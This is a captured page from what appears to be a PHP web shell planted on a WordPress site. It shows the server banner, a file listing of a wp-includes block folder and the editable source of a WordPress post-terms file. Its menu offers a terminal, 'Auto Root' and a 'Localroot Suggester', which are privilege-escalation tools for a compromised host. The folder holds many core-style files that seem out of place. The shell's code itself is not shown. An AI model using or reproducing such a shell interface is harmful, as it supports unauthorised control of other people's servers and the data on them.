Linux webserver 6.8.0-49-generic #49~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Nov 6 17:42:15 UTC 2 x86_64
Apache/2.4.52 (Ubuntu)
Server IP : 192.168.1.1 & Your IP : 3.145.2.74
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
theprintave /
wp-includes /
blocks /
heading /
Delete
Unzip
Name
Size
Permission
Date
Action
block-bindings.php
5.46
KB
-rw-r--r--
2024-07-16 17:55
block.json
1.74
KB
-rw-r--r--
2025-04-15 17:44
button.php
1.76
KB
-rw-r--r--
2024-07-16 17:55
cache-compat.php
5.83
KB
-rw-r--r--
2022-10-10 18:22
class-IXR-introspectionserver.php
5.2
KB
-rw-r--r--
2016-08-26 22:08
class-http.php
367
B
-rw-r--r--
2022-06-17 11:20
class-oembed.php
401
B
-rw-r--r--
2022-06-17 11:20
class-simplepie.php
453
B
-rw-r--r--
2024-11-13 12:36
class-wp-hook.php
15.63
KB
-rw-r--r--
2023-09-18 12:41
class-wp-locale.php
16.49
KB
-rw-r--r--
2025-04-15 17:44
class-wp-network.php
12.01
KB
-rw-r--r--
2024-11-13 12:36
class-wp-phpmailer.php
3.71
KB
-rw-r--r--
2025-04-15 17:44
class-wp-taxonomy.php
18.12
KB
-rw-r--r--
2025-04-15 17:44
class.wp-styles.php
338
B
-rw-r--r--
2022-09-20 14:17
comments-pagination-next.php
1.88
KB
-rw-r--r--
2024-11-13 12:36
comments-pagination-numbers.php
1.59
KB
-rw-r--r--
2024-07-16 17:55
comments-pagination.php
1.17
KB
-rw-r--r--
2024-07-16 17:55
comments-title.php
2.71
KB
-rw-r--r--
2024-07-16 17:55
comments.php
6.61
KB
-rw-r--r--
2024-07-16 17:55
feed-rss.php
1.16
KB
-rw-r--r--
2020-01-29 00:45
footnotes.php
3.68
KB
-rw-r--r--
2024-04-03 05:49
https-migration.php
4.63
KB
-rw-r--r--
2023-07-10 22:38
latest-comments.php
4.92
KB
-rw-r--r--
2024-07-16 17:55
latest-posts.php
8.34
KB
-rw-r--r--
2024-11-13 12:36
ms-deprecated.php
21.25
KB
-rw-r--r--
2024-07-16 17:55
ms-files.php
2.68
KB
-rw-r--r--
2025-04-30 17:44
navigation.php
48.46
KB
-rw-r--r--
2025-04-15 17:44
pattern.php
1.75
KB
-rw-r--r--
2025-04-15 17:44
plugin.php
34.74
KB
-rw-r--r--
2024-07-16 17:55
post-date.php
3.05
KB
-rw-r--r--
2024-11-13 12:36
post-excerpt.php
3.37
KB
-rw-r--r--
2024-07-16 17:55
post-terms.php
3.55
KB
-rw-r--r--
2025-04-15 17:44
post-title.php
2.09
KB
-rw-r--r--
2024-07-16 17:55
registration-functions.php
200
B
-rw-r--r--
2020-11-12 11:17
robots-template.php
5.06
KB
-rw-r--r--
2022-04-06 15:33
rss.php
22.57
KB
-rw-r--r--
2024-11-13 12:36
shortcodes.php
23.49
KB
-rw-r--r--
2024-07-16 17:55
site-title.php
1.81
KB
-rw-r--r--
2025-04-15 17:44
spl-autoload-compat.php
441
B
-rw-r--r--
2020-11-12 11:17
style-engine.php
7.39
KB
-rw-r--r--
2025-05-09 07:39
style-rtl.css
1
KB
-rw-r-----
2023-09-26 14:23
style-rtl.min.css
1015
B
-rw-r-----
2023-09-26 14:23
style.css
1
KB
-rw-r-----
2023-09-26 14:23
style.min.css
1015
B
-rw-r-----
2023-09-26 14:23
template-part.php
9.92
KB
-rw-r--r--
2025-04-15 17:44
widget-group.php
2.38
KB
-rw-r--r--
2024-07-16 17:55
wp-db.php
445
B
-rw-r--r--
2022-07-21 22:45
Save
Rename
<?php /** * Server-side rendering of the `core/post-terms` block. * * @package WordPress */ /** * Renders the `core/post-terms` block on the server. * * @since 5.8.0 * * @param array $attributes Block attributes. * @param string $content Block default content. * @param WP_Block $block Block instance. * @return string Returns the filtered post terms for the current post wrapped inside "a" tags. */ function render_block_core_post_terms( $attributes, $content, $block ) { if ( ! isset( $block->context['postId'] ) || ! isset( $attributes['term'] ) ) { return ''; } if ( ! is_taxonomy_viewable( $attributes['term'] ) ) { return ''; } $classes = array( 'taxonomy-' . $attributes['term'] ); if ( isset( $attributes['textAlign'] ) ) { $classes[] = 'has-text-align-' . $attributes['textAlign']; } if ( isset( $attributes['style']['elements']['link']['color']['text'] ) ) { $classes[] = 'has-link-color'; } $separator = empty( $attributes['separator'] ) ? ' ' : $attributes['separator']; $wrapper_attributes = get_block_wrapper_attributes( array( 'class' => implode( ' ', $classes ) ) ); $prefix = "<div $wrapper_attributes>"; if ( isset( $attributes['prefix'] ) && $attributes['prefix'] ) { $prefix .= '<span class="wp-block-post-terms__prefix">' . $attributes['prefix'] . '</span>'; } $suffix = '</div>'; if ( isset( $attributes['suffix'] ) && $attributes['suffix'] ) { $suffix = '<span class="wp-block-post-terms__suffix">' . $attributes['suffix'] . '</span>' . $suffix; } $post_terms = get_the_term_list( $block->context['postId'], $attributes['term'], wp_kses_post( $prefix ), '<span class="wp-block-post-terms__separator">' . esc_html( $separator ) . '</span>', wp_kses_post( $suffix ) ); if ( is_wp_error( $post_terms ) || empty( $post_terms ) ) { return ''; } return $post_terms; } /** * Returns the available variations for the `core/post-terms` block. * * @since 6.5.0 * * @return array The available variations for the block. */ function block_core_post_terms_build_variations() { $taxonomies = get_taxonomies( array( 'publicly_queryable' => true, 'show_in_rest' => true, ), 'objects' ); // Split the available taxonomies to `built_in` and custom ones, // in order to prioritize the `built_in` taxonomies at the // search results. $built_ins = array(); $custom_variations = array(); // Create and register the eligible taxonomies variations. foreach ( $taxonomies as $taxonomy ) { $variation = array( 'name' => $taxonomy->name, 'title' => $taxonomy->label, 'description' => sprintf( /* translators: %s: taxonomy's label */ __( 'Display a list of assigned terms from the taxonomy: %s' ), $taxonomy->label ), 'attributes' => array( 'term' => $taxonomy->name, ), 'isActive' => array( 'term' ), 'scope' => array( 'inserter', 'transform' ), ); // Set the category variation as the default one. if ( 'category' === $taxonomy->name ) { $variation['isDefault'] = true; } if ( $taxonomy->_builtin ) { $built_ins[] = $variation; } else { $custom_variations[] = $variation; } } return array_merge( $built_ins, $custom_variations ); } /** * Registers the `core/post-terms` block on the server. * * @since 5.8.0 */ function register_block_core_post_terms() { register_block_type_from_metadata( __DIR__ . '/post-terms', array( 'render_callback' => 'render_block_core_post_terms', 'variation_callback' => 'block_core_post_terms_build_variations', ) ); } add_action( 'init', 'register_block_core_post_terms' );